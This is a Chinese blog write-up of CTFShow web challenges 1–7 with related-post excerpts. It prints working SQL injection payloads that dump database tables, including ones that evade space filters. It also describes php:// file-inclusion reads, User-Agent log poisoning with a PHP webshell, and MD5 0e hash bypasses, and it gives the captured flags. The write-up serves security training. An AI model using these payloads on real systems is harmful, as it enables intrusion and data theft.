CtfShow-web-1~7

最新推荐文章于 2025-04-05 17:03:56 发布
最新推荐文章于 2025-04-05 17:03:56 发布
阅读量324 收藏
点赞数
分类专栏: CTF 文章标签: 前端 数据库 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43036356/article/details/134166081
版权
文章讲述了在一系列网络安全挑战中,参与者通过SQL注入、解密加密字符串、任意文件读取以及PHP伪协议等技术手段解决web1至web7关卡的问题,涉及数据库操作、数据提取和安全绕过策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1. web1
2. web2
3. web3
4. web4
5. web5
6. web6
7. web7

第一关


在这里插入图片描述

第一关很简单,启动环境,进入连接后,页面问,flag在哪里,直接按F12查看源码。

在这里插入图片描述
在这里插入图片描述

将这个加密字符串,解密后就是flag了。

解密的网址
在这里插入图片描述

ctfshow{dfbcb744-e937-4b08-9858-0a70274d3229}

第二关


在这里插入图片描述

很明显是sql注入,应为这里是登录,我们使用select 判断输出位。

1'or 1=1 union select 1,2,3;#

在这里插入图片描述


在这里插入图片描述

查询当前使用数据库-web2
-1'union select 1,database(),3;#

在这里插入图片描述


查询所有的表
-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3;#

在这里插入图片描述


查询flag表字段名
-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag' and table_schema='web2'),3;#

在这里插入图片描述


查询flag数据
-1'union select 1,(select group_concat(flag) from web2.flag),3;#

在这里插入图片描述

ctfshow{30106bc0-f0f3-4a4a-8b53-a88a2c4d9ca7}

第三关

在这里插入图片描述

根据靶机页面提示,可知到,本关卡考点是任意文件读取。
在这里插入图片描述
这里我们使用php的伪协议中的php://,来读取和执行我们的命令。

关于php伪协议,可以下面这偏文章:
https://blog.youkuaiyun.com/m0_73720136/article/details/130543930

在这里插入图片描述
执行了ls命令之后,我们可以看到出现了两个文件。我们读取这个ctf_go_go_go文件。
在这里插入图片描述

ctfshow{1c2b9571-4339-48cf-94a3-196c6ac08686}

第四关

在这里插入图片描述
这一关依旧是文件读取,但是发现伪协议不行了
在这里插入图片描述

这里读取当前环境的日志文件,读取成功,那么可以使用日志注入webshell。我们写入的php一句话会被解析从而实现shell的写入。
在这里插入图片描述

BP抓包,在UA头写入webshell一句话木马。然后放包访问。
在这里插入图片描述

然后使用一句话木马连接。成功找到flag。
在这里插入图片描述
在这里插入图片描述

ctfshow{a55835a0-d14e-44f0-9ac1-ebea1e77245e}

第五关


在这里插入图片描述
在这里插入图片描述

根据提示源码,需要输入两个参数,v1,v2。且v2是数字,v1是字符串,且它们的md5值需相同。
该靶场环境是php搭建的。
故:PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。

以下是两个md5以0E开头的字符串和数字。

QNKCDZO
0e830400451993494058024219903391
240610708
0e462097431906509019562988736854

输入即可
在这里插入图片描述

第六关

在这里插入图片描述
看页面,肯定是sql注入无疑了。
fuzz了一下,发现过滤了空格。
空格被过滤了,可以使用 ()或者/**/行内注释进行绕过。
在这里插入图片描述
已经发现过滤,和已经成功绕过,后面的就好办了,重复写sql就行了。
这里是登录,不能使用order by进行探测。可以直接使用 union select 1,2,3……进行探测输出位。
在这里插入图片描述

获取数据库
1'union(select(1),database(),3)#

获取表
1'union(select(1),(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),3);#

获取表字段
1'union(select(1),(select(group_concat(column_name))from(information_schema.columns)where(table_schema=database())and(table_name='flag')),3);#

获取数据
1'union(select(1),(select(flag)from(web2.flag)),3);#

flag
ctfshow{665fcdc5-e8d2-42ee-81ff-a9818bbffe86}

第七关


在这里插入图片描述

点击文章发现该靶场是以get方式的传参,无疑是sql注入了。
但经过fuzz发现,过滤了空格和()
但是我们依然可以使用//进行绕过**
在这里插入图片描述

查当前所使用的数据库
1'/**/union/**/select/**/1,database(),3#

查表名字
1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),3#

查字段名字
1'/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema="web7"/**/and/**/table_name="flag"),3#

查数据
1'/**/union/**/select/**/1,(select/**/flag/**/from/**/web7.flag),3#

在这里插入图片描述

ctfshow{7aea9b9d-aa46-416c-927f-3eed7b486156}
ctfshowweb】——信息搜集篇1web1~20详解)
练习时长两年半的CTF爱好者
02-22 3725
此题为 【从0开始学web】系列第二十题 此系列题目从最基础开始,题目遵循循序渐进的原则 希望对学习CTF WEB的同学有所帮助。
2024年网络安全最全ctfshow-WEB-web5_ctfshow web5
2401_84281698的博客
05-03 685
ctf.show WEB模块第5关需要传递两个参数,一个字符串,一个数字,并且两个参数的md5值必须相同,我们可以利用md5的0e漏洞进行绕过0e绕过是指:0e开头的字符串在参与弱类型比较时,会被当做科学计数法,结果转换为0;我们只要传入两个md5值是以0e开头的参数,即可绕过md5加密,夺取flag页面中展示了部分源码,从源码中我们可以得知,想要夺旗需要通过GET请求传递两个参数v1和v2,并且参数v1必须是纯字母字符串,参数v2必须是数字或者数字字符串,并且两个参数的md5值必须相等。
ctfshow web入门——web7
m0_74093152的博客
01-29 421
ctfshowweb入门——web7
[ctfshow web入门] web1 梦开始的地方
最新发布
qq_50332504的博客
04-05 265
通过网络工具捕获网络传输过程中的数据包,并进行截获、重发、编辑、转存等操作。这里我们主要是截获和查看。
CTF-show WEB入门--web7
m0_73912575的博客
12-30 721
CTF-show WEB入门--web7
CTFshow web1
羽的博客
02-26 6455
题目地址:https://ctf.show 扫描后台拿到源码(www.zip)。打开login.php能禁的基本都禁干净了,登录页面貌似没有注入的可能。reg.php也是如此,所以注册页面也没可能了。剩下最后一个就是显示信息的页面了。这里可以看到在数据库中是把所有的字段(包括密码)都给查出来了,但是没有显示密码的地方。 我们可以利用?order=pwd来判断注册的密码与flag用户密码的大小(...
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
ctfshow-WEB-web2_ctf
2401_84297618的博客
04-28 641
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可在用户名的输入框中输入万能账号 a’ or true #,密码随便输登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输。
2024年网安最新ctfshow-WEB-web6_ctf(1)
2401_84297899的博客
05-03 1224
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库web2。
ctfshow-Web入门-58~74wp
yutianovo的博客
09-24 1220
Web58-65 POST c=include($_GET['url']); GET /?url=php://filter/read=convert.base64-encode/resource=flag.php Web66-70 flag 换位置了 /flag.txt Payload还可以用 Web71 import requests url = "http://c5e8824e-b5b4-4842-8d39-bbcb78eb7976.chall.ctf.show/" d = {'c': 'i
ctfshow- web1(50 point)
HAI_WD的博客
08-29 921
这里有一个坑哇,这里注册的时候密码会给你md5,数据库里存储的也是md5,所以需要我们手动修改为字符。通过url发现这里是通过order by进行了排序,测试发现一共5个字段,并且3是按照密码进行排序。那么思路就是,一个字符一个字符的去进行测试。尝试弱口令无果,可以注册,尝试注册一个账号。首先映入眼帘的是登录界面。
CTFShow web1-7——CTF秀WEB模块解题思路_ctfshow web题目解析
2401_84297035的博客
05-16 395
日志注入是文件包含漏洞的一种利用方式, web服务器的日志文件会保存网站的访问记录, 包括请求的源地址, 时间, 请求方式, User-Agent, Referer等HTTP请求头, 如果在这些请求头中插入代码, 则代码会被保存在web服务器的日志文件中, 当我们访问日志文件的时候, 文件中的代码则会被执行。解题过程中用到了两种文件包含漏洞的利用方式, 一种MD5加密的绕过方式, 一种SQL注入漏洞的绕过方式, 接下来, 针对这几种方式的实现原理解释一下。
ctfshow web入门——web1
m0_74093152的博客
01-28 105
ctfshowweb入门——web1
CTFshow web入门 web1
weixin_45990644的博客
07-06 305
CTFshow web入门 web1 这道题目比较简单,题目中有提到 “开发注释未及时删除” 点击连接后页面如下:按F12加入开发者模式查找注释(题目有提到),即可得到flag: 补充: 1.做题多看题目。 2.按F12是进加入开发者界面,主要功能简单来说可以帮助开发者调试js和根据页面元素快速定位,确认请求相应时间和相应内容等,根据内容进行程序调优用。 参考来源: https://www.bilibili.com/video/BV14y4y1J7Yb https://zhidao.baidu.com/qu
ctfshowweb入门1
夜未至
03-21 593
在开发场景中,开发人员会忘记将开发时的注释删掉,导致一些意外的问题( 如:getshell),但是在真实场景中基本上是不可能发生的。不过作为初学者应该去了解这些问题。
CTFshow---WEB入门---web7、8
qq_43752749的博客
12-11 445
web7web8都是因为.git或者.svn版本控制错误配置所造成的源码泄露。根据提示可知存在版本控制配置不当。
ctfshow-WEB-web7
热门推荐
wangyuxiang946的博客
08-22 1万+
ctf.show WEB模块第7关是一个SQL注入漏洞,注入点是数值型注入,源码中过滤了空格,我们可以使用括号()或者注释/**/来代替空格 页面中有一个文章列表,随便点一个 从url地址栏中可以看到,页面通过文章的id值来查询文章内容,我们可以考虑SQL注入漏洞 首先判断注入点,输入以下payload,使SQL恒成立 1/**/and/**/1 可以看到,页面正常显示 在输入以下payload,使SQL恒不成立 1/**/and/**/0 可以...
CTFSHOW-web-web4
12-27
### CTF SHOW Web 类别挑战资源与解决方案 对于参与CTF SHOW平台上Web类别的挑战,特别是针对`web4`这一具体题目,可以借鉴一些通用的Web安全漏洞利用技巧以及特定于该平台的经验分享。通常情况下,这类挑战会涉及到常见的Web应用程序漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞(LFI/RFI)等。 为了更好地理解和解决这些挑战,可以从以下几个方面入手: #### 学习基础理论和技术 深入理解HTTP协议的工作原理及其请求响应机制是非常重要的。掌握如何通过浏览器开发者工具分析网络流量可以帮助识别潜在的安全问题[^1]。 #### 利用在线学习资源 有许多优质的网站提供了关于Web渗透测试的学习材料和实践环境,例如OWASP Top Ten项目文档,它列举并解释了当前最严重的Web应用风险;还有像PortSwigger Academy这样的平台提供了一系列课程来教授各种类型的Web漏洞挖掘方法。 #### 参考社区讨论和Writeup 加入相关的技术论坛或社交媒体群组,在那里可以看到其他参赛者发布的writeups(解题报告),这对于获取灵感非常有帮助。GitHub上也有很多开源仓库专门收集整理了不同赛事下的高质量writeup链接集合。 ```python import requests def check_sql_injection(url, param): test_payload = "' OR '1'='1" data = {param: test_payload} response = requests.post(url, data=data) if "Welcome" in response.text: print(f"[+] SQL Injection vulnerability detected on parameter '{param}'!") else: print("[-] No SQL Injection found.") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值